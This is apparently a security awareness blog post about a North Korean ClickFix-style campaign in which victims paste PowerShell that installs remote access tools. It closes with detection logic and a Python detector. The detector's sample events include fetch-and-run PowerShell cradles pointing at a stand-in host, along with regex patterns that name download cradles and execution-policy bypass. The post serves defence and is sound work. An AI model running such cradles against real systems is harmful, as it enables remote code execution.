Hackers Are Tricking People to Hack Their Own Computers



Imagine a hacker doesn’t break into your computer.
Instead, they convince you to open PowerShell as an administrator and paste their code yourself.

That’s exactly what’s happening in a new cyber-espionage attack uncovered by Microsoft Threat Intelligence — and it’s both clever and dangerous.

This attack is being carried out by a North Korean state-backed hacking group called Emerald Sleet, also known as Kimsuky or VELVET CHOLLIMA.

Let’s break it down in simple language, so anyone can understand it.

 

What Is This Attack About?

Instead of sending malware or exploiting software bugs, hackers are using trust and psychology.

They:

  • Pretend to be government officials

  • Build relationships with victims

  • Then trick them into running malicious PowerShell commands themselves

No hacking skills required from the victim — just one mistake.

 

Who Are the Hackers?

Emerald Sleet is a North Korean government-backed cyber-espionage group.

They usually spy on:

  • Government employees

  • NGOs

  • Journalists

  • Researchers

  • International affairs professionals

Especially people working on Northeast Asia–related topics.

Their goal isn’t quick money — it’s stealing sensitive information.

 

Who Is Being Targeted?

Microsoft observed attacks against people and organizations in:

  • North America

  • Europe

  • East Asia

  • South America

The victims include:

  • Government agencies

  • NGOs

  • Media organizations

  • Think tanks

  • Policy experts

 

How the Attack Works (Step by Step)

Step 1: Building Trust

Hackers pretend to be South Korean government officials and communicate politely over time.
Nothing suspicious at first.


Step 2: A Convincing Email

Once trust is built, the victim receives an email with:

  • A PDF attachment

  • A message saying the document needs device registration to open

Sounds official, right?


Step 3: The Fake Registration Link

The email contains a link that:

  • Looks legitimate

  • Claims to register your device

  • Gives instructions to proceed


Step 4: The Dangerous Trick

The website tells the victim to:

  1. Open PowerShell

  2. Run it as Administrator

  3. Copy and paste code provided on the page

⚠️ This is the critical moment.

The victim unknowingly runs the hacker’s code themselves.


Step 5: Your Device Is Now Registered to Hackers

Once the code runs:

  • A browser-based remote desktop tool is downloaded and installed

  • A certificate file (with a hard-coded PIN) is downloaded from a remote server

  • The device is registered with an attacker-controlled server using that certificate and PIN, so the attackers can reach it on demand

From this point on, attackers can:

  • Access the system remotely

  • Monitor activity

  • Steal files and emails


Why This Attack Is So Dangerous

This attack works because:

  • ❌ No malicious executable is attached; the payload is code the victim pastes in themselves

  • ❌ No software vulnerability is exploited

  • ❌ The only prompt the victim sees is the normal UAC consent dialog, which they approve because the instructions told them to run PowerShell as Administrator

  • ✅ The user gives admin access willingly

Because the command is typed by the logged-on administrator into a legitimate, Microsoft-signed binary (powershell.exe), there is no attachment to scan and no exploit to block. Unless command lines and script blocks are being logged, the activity looks like routine admin work, and that is what makes the technique so effective.


Signs Your System May Be Compromised (Behavioural Indicators)

These are behaviours to watch for rather than file hashes or domains:

On Your Computer

  • A PowerShell window you opened as Administrator because an email or web page told you to, or one opened elevated without IT's knowledge

  • A remote desktop or remote access tool you did not install, typically appearing right after that PowerShell session

  • Certificate files turning up in Downloads or temp folders that you never requested

On the Network

  • powershell.exe making outbound HTTPS connections right after it launches, to hosts nobody in the organisation recognises

  • Ongoing background traffic from the new remote access tool even when the machine is idle


What Microsoft Says

Microsoft confirmed:

  • This activity has been observed since January 2025

  • Microsoft Defender XDR detects this activity

  • Microsoft is notifying customers who were targeted or compromised


How to Stay Safe

For Everyone

  • ❌ Never paste commands from an email or web page into PowerShell, the Run dialog or a terminal, and especially not as Administrator

  • ❌ Don't trust "device registration" or "verification" instructions that arrive by email; legitimate registration never requires you to type commands

  • ✅ Verify requests through official channels (call the sender on a number you already have, not one taken from the email)


For Organizations

  • Train employees about phishing and social engineering, including this "paste this into PowerShell" pattern (widely known as ClickFix)

  • Monitor PowerShell usage: enable Script Block Logging and Module Logging, and collect process-creation events with full command lines (Windows event 4688 with command-line auditing, or Sysmon Event ID 1)

  • Restrict administrator privileges: day-to-day accounts should not be local admins, so a pasted command cannot elevate without a separate privileged sign-in

  • Use advanced email and endpoint protection, and consider application control (AppLocker / WDAC) and PowerShell Constrained Language Mode for users who never need full PowerShell


The Big Lesson

Hackers don’t always need advanced malware.

Sometimes, all they need is your trust.

This attack proves that:

  • People are part of the attack surface, not just software

  • Social engineering can be as effective as an exploit, at far lower cost to the attacker

  • Awareness matters as much as antivirus software


📊 Detection & Monitoring (SIEM / XDR Mapping)

Microsoft Defender XDR Capabilities

Microsoft states that Defender XDR detects this activity. In SIEM/XDR terms, the behaviours worth alerting on are:

  • Abnormal PowerShell usage: elevated sessions whose command line contains a download cradle, an encoded command or an execution-policy bypass

  • A PowerShell process that starts and almost immediately reaches out to the internet

  • New remote access software and certificate files appearing right after that session


🔎 Sample Detection Logic (High Level)

Suspicious Elevated PowerShell Execution

Image ends with powershell.exe OR pwsh.exe
AND process is elevated (Sysmon IntegrityLevel = High, or token elevation in event 4688)
AND CommandLine contains a download cradle (Invoke-WebRequest / iwr / curl / Invoke-RestMethod / irm / Net.WebClient DownloadString / Start-BitsTransfer)
    OR -EncodedCommand OR -ExecutionPolicy Bypass OR -WindowStyle Hidden

Matching only "Invoke-WebRequest" is too narrow: the pasted one-liners use aliases and .NET calls just as often, so cover the aliases and the launch flags too, and baseline your own admin scripts to keep the noise down.

PowerShell Followed by Network Activity

powershell.exe process creation → outbound connection from the same process (Sysmon Event ID 3 / DeviceNetworkEvents) within roughly 60 seconds, to a destination that is not on the organisation's allow-list
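As an added example (not code from the original post, and not Microsoft's detection logic), here are the two rules above implemented in Python over a handful of constructed Sysmon-style records: Event ID 1 for process creation and Event ID 3 for network connections. The events, PIDs, timestamps, the 203.0.113.x addresses and the example.invalid host are all made up for illustration; only the field names follow Sysmon's schema. It goes slightly beyond the text by also scoring an unelevated download cradle as a medium-severity finding, and by filtering out elevated PowerShell with an ordinary command line, which is what keeps the rule from paging on every admin.

```python
"""Flag pasted-cradle PowerShell runs and tie them to follow-on network traffic.

Added example for this post, not the original article's or Microsoft's code.
Input is a list of Sysmon-style event dicts (EventID 1 = process creation,
EventID 3 = network connection); SAMPLE_EVENTS below is constructed data.
"""
from __future__ import annotations

import re
from datetime import datetime, timedelta

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed records. 203.0.113.0/24 and example.invalid are reserved
# documentation values, not real attacker infrastructure.
SAMPLE_EVENTS = [
    # Victim followed the "device registration" page: elevated shell + cradle.
    {"EventID": 1, "UtcTime": "2025-02-10 09:14:02", "ProcessId": 4321,
     "Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "High",
     "CommandLine": 'powershell.exe -ExecutionPolicy Bypass -Command '
                    '"irm https://example.invalid/register.ps1 | iex"'},
    {"EventID": 3, "UtcTime": "2025-02-10 09:14:04", "ProcessId": 4321,
     "Image": PS_IMAGE, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # Benign: an administrator checking services, no download, no egress.
    {"EventID": 1, "UtcTime": "2025-02-10 09:20:00", "ProcessId": 5120,
     "Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "High",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service"'},
    # Unelevated download cradle: not the admin pattern, still worth a look.
    {"EventID": 1, "UtcTime": "2025-02-10 09:31:10", "ProcessId": 6001,
     "Image": PS_IMAGE, "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium",
     "CommandLine": "powershell.exe -c \"(New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/a')\""},
    {"EventID": 3, "UtcTime": "2025-02-10 09:31:11", "ProcessId": 6001,
     "Image": PS_IMAGE, "DestinationIp": "203.0.113.11", "DestinationPort": 443},
]

POWERSHELL_NAMES = ("powershell.exe", "pwsh.exe")
ELEVATED_LEVELS = ("High", "System")

# Download cradles and launch flags a pasted one-liner tends to use.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|invoke-restmethod|\birm\b|"
    r"net\.webclient|downloadstring|downloadfile|start-bitstransfer|"
    r"invoke-expression|\biex\b", re.I)
POLICY_BYPASS = re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
ENCODED_CMD = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def is_powershell(ev: dict) -> bool:
    return ev.get("Image", "").lower().endswith(POWERSHELL_NAMES)


def classify_process(ev: dict) -> list[str]:
    """Reasons a process-creation event looks like a pasted PowerShell cradle.

    "elevated" alone is not suspicious (admins use PowerShell all day);
    callers should require at least one command-line signal as well.
    """
    if ev.get("EventID") != 1 or not is_powershell(ev):
        return []
    cmd = ev.get("CommandLine", "")
    reasons = ["elevated"] if ev.get("IntegrityLevel") in ELEVATED_LEVELS else []
    for name, pattern in (("download-cradle", DOWNLOAD_CRADLE),
                          ("executionpolicy-bypass", POLICY_BYPASS),
                          ("hidden-window", HIDDEN_WINDOW),
                          ("encoded-command", ENCODED_CMD)):
        if pattern.search(cmd):
            reasons.append(name)
    return reasons


def correlate(events: list[dict], window: timedelta = timedelta(seconds=60)) -> list[dict]:
    """Pair suspicious PowerShell starts with outbound connections from the same PID.

    Severity: high = elevated AND network follow-up inside `window`;
    medium = one of the two; low = command-line signal only.
    """
    net = [e for e in events if e.get("EventID") == 3]
    findings = []
    for ev in events:
        reasons = classify_process(ev)
        if not [r for r in reasons if r != "elevated"]:
            continue  # plain elevated PowerShell with an ordinary command line
        t0 = parse_time(ev["UtcTime"])
        egress = [n for n in net
                  if n["ProcessId"] == ev["ProcessId"]
                  and timedelta(0) <= parse_time(n["UtcTime"]) - t0 <= window]
        elevated = "elevated" in reasons
        severity = "high" if elevated and egress else "medium" if elevated or egress else "low"
        findings.append({
            "ProcessId": ev["ProcessId"],
            "CommandLine": ev["CommandLine"],
            "reasons": reasons + (["network-follow-up"] if egress else []),
            "destinations": [f"{n['DestinationIp']}:{n['DestinationPort']}" for n in egress],
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid={f['ProcessId']} {', '.join(f['reasons'])} "
              f"-> {f['destinations']}\n    {f['CommandLine']}")
```

Run as-is it reports the PID 4321 event as high severity (elevated, cradle, policy bypass, egress two seconds later) and PID 6001 as medium, and says nothing about the benign Get-Service session. In Defender XDR Advanced Hunting the same correlation is a join of DeviceProcessEvents with DeviceNetworkEvents on DeviceId and the initiating process ID inside a short time window; whichever tool you use, tune it by baselining your own automation's command lines and allow-listing the update and management hosts your admins' scripts legitimately contact.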

Final Thoughts

Emerald Sleet’s latest campaign shows how simple instructions can lead to complete system compromise.

If an email ever asks you to:

“Open PowerShell as administrator and paste this code”

That’s your biggest red flag 🚩

When in doubt — don’t click, don’t paste, and ask first.

